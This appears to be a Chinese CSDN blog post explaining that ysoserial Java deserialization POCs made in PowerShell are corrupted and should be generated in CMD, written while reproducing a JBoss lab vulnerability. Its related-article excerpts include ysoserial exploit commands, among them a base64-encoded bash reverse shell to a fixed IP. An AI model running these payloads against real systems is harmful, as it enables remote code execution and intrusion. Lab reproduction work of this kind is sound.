反序列化工具ysoserial生成的payload无效 | 请使用CMD生成POC

最新推荐文章于 2024-09-02 08:43:01 发布
最新推荐文章于 2024-09-02 08:43:01 发布
阅读量1.6k 收藏
点赞数 2
分类专栏: 工具 文章标签: POC 纠错
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JiangBuLiu/article/details/95358897
版权
本文探讨了ysoserial生成的payload在Powershell下无效的问题,原因是POC文件含有0x00字符及不同的文件头。解决方法是通过CMD命令行生成POC文件,避免因Powershell导致的不兼容问题。
摘要由CSDN通过智能技术生成

ysoserial请使用CMD生成POC


在复现 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞时,完全按步骤操作,但是POC一直不能成功执行

以为是HTTP请求头/命令有问题,一直试一直改,包括生成POC的命令,因为ysoserial的参数CommonsCollections有的是1,有的是5,也全部试了,最后发现是powershell的问题?

因为贪图方便,一直都是在Windows对应的目录下,按住Shift+右键,选择在此处打开Powershell来执行命令,最后发现,Powershellcmd下生成的文件并不一样

POC文件

Powershell下的POC文件

在这里插入图片描述

CMD下的POC文件

在这里插入图片描述

不同处

POC夹着很多0x00,文件头也不一样???

建瓯最坏
关注
专栏目录
ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3435
ysoserial这款工具,堪称为“java反序列利用神器”。
ysoserial:概念证明工具,用于生成利用不安全的Java对象反序列化的有效负载
05-12
约瑟 一种概念证明工具,用于生成利用不安全的Java对象反序列化的有效负载。 描述 最初作为AppSecCali 2015讲座一部分发布,其中包含针对Apache Commons Collections(3.x和4.x),Spring Beans / Core(4.x)和Groovy( 2.3.x)。 后来进行了更新,以包括其他小工具链和其他几个库。 ysoserial是在通用Java库中发现的实用程序和面向属性的编程“小工具链”的集合,可以在适当的条件下利用Java应用程序对对象执行不安全的反序列化。 主驱动程序接受用户指定的命令,并将其包装在用户指定的小工具链中,然后将这些对象序列化为stdout。 当在类路径上具有必需小工具的应用程序不安全地反序列化此数据时,该链将自动被调用并导致命令在应用程序主机上执行。 应该注意的是,漏洞在于应用程序执行不安全的反序列化,而不是在类路径上具
ysoserial生成payload无效
J5ong的博客
08-22 1855
ysoserial生成payload无效?  最近在写反序列化pocpayload自然是用ysoserial来生成,然后,攻击失败!!!(攻击vulhub docker上的靶机) 使用的语句:java -jar ysoserial.jar CommonsCollections1 'touch /tmp/success' > d:\payload.ser 就很懵,开始了漫漫找原因之...
ysoserial 项目使用教程
最新发布
gitblog_00963的博客
09-02 393
ysoserial 项目使用教程 ysoserial项目地址:https://gitcode.com/gh_mirrors/ysos/ysoserial 1. 项目的目录结构及介绍 ysoserial 是一个用于生成 Java 反序列化漏洞 payload工具。以下是项目的目录结构及其介绍: ysoserial/ ├── src/ │ ├── main/ │ │ ├── java...
解决Error while generating or serializing payload java.lang.reflect.InaccessibleObjetExceotion:Unable
精品博客,你值得一看~
08-22 1262
Error while generating or serializing payload java.lang.reflect.InaccessibleObjetExceotion:Unable to make field private transient java.util.HashMap java.util.HashSet.map accessible:module java.base does not "opens java.util"ysoserial-main-923a2bda4e-1.jar
java: 程序包xxx不存在
青山的博客
03-23 472
java: 程序包com.qshh.abcd.ab.bank.file.dao不存在
ysoserial-0.0.5-all.jar
08-27
ysoserial-0.0.5-all.jar反序列化漏洞利用,jar可以直接使用
weblogic之T3反序列化
weixin_45682070的博客
03-02 2051
T3协议 什么是T3协议? 解释摘抄自此文 Weblogic的RMI规范的实现使用一个专有协议T3。 您可以将T3(和安全T3S)视为坐在http之上的一个图层,以公开/允许客户端的JNDI调用。 通常,T3协议用于与WebLogic控制台进行交互。 T3是用于在WebLogic服务器和其他types的Java程序之间传输信息的协议。 WebLogic会跟踪连接到应用程序的每个Java虚拟机。 为了将stream量传送到Java虚拟机,WebLogic创build一个T3连接。 这种types的连接通过消除
struts2反序列化
Finlinlts的博客
08-30 1350
​ 漏洞搭建 首先配置好Tomcat,然后将对应漏洞的版本下载到Tomcat目录下的webapp目录,访问对应的链接,例如http://127.0.0.1:8080/struts-032/,成功即搭建完成。
【漏洞复现】用友-U8C-反序列化-ClientRequestDispatch
知黑而守白
04-19 184
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。用友U8C ClientRequestDispatch接口存在反序列化漏洞,使得攻击者可以通过构造特定的求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
ysoserial下载
12-26
java反序列化漏洞检测工具,可以自动生成playload,测试用的 有需要的同学拿去用
ysoserial-0.0.2
12-25
weblogic反序列化漏洞 测试用的 有需要的同学拿去用
最新版ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
07-23
github已经不怎么好下载的,作者已经把文件上传到其他的平台,刚刚使用的时候遇到了一点问题,要将原文件名改正确了之后才能用。
反序列化测试工具 ysoserial-master-v0.0.5 打包
05-21
用法 java -cp ysoserial-master-v0.0.5 ysoserial.exploit.RMIRegistryExploit 192.168.192.118 1099 CommonsCollections1 "notepad.exe"
ysoserial payloads/JRMPListener
洋洋的小黑屋
07-28 62
payloads/JRMPListener JRMPListener的攻击流程: 1.生成payloads/JRMPListener发送给服务器,当服务器反序列化payloads/JRMPListener后,即会开启一个端口进行监听。 2.使用exploit/JRMPClient模块发送payload,服务器就会把payload进行反序列化,从而完成进行攻击。 直接通过ysoserial源码调试...
2020HW漏洞总结(三)
weixin_45358803的博客
09-27 7476
来自IDLab整理的漏洞详情 01.联软任意文件上传漏洞 • 已知存在漏洞的url如下: http://IP:80/uai/newDevRegist/updateDevUploadinfo.htm(只有201904-1SP起才存在该漏洞)http://IP:80/uai/download/uploadfileToPath.htm(受影响的版本都存在该漏洞)http://IP:80/uai/newDevRegist/newDevRegist/newDevRegist/…;/…;/updateDevUploa
(38)【JAVA反序列化漏洞】简介、原理、工具、环境、靶场、思路
04-23 3843
【专题】JAVA反序列化
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)
精品博客,你值得一看~
08-25 1376
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
如何使用ysoserial利用payload
06-03
使用 ysoserial 生成 Payload 后,需要将 Payload 传输到目标系统,并触发目标系统反序列化 Payload,从而执行攻击者构造的恶意代码。 具体利用步骤如下: 1. 选择合适的 Payload 类型 根据目标系统的情况,选择...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值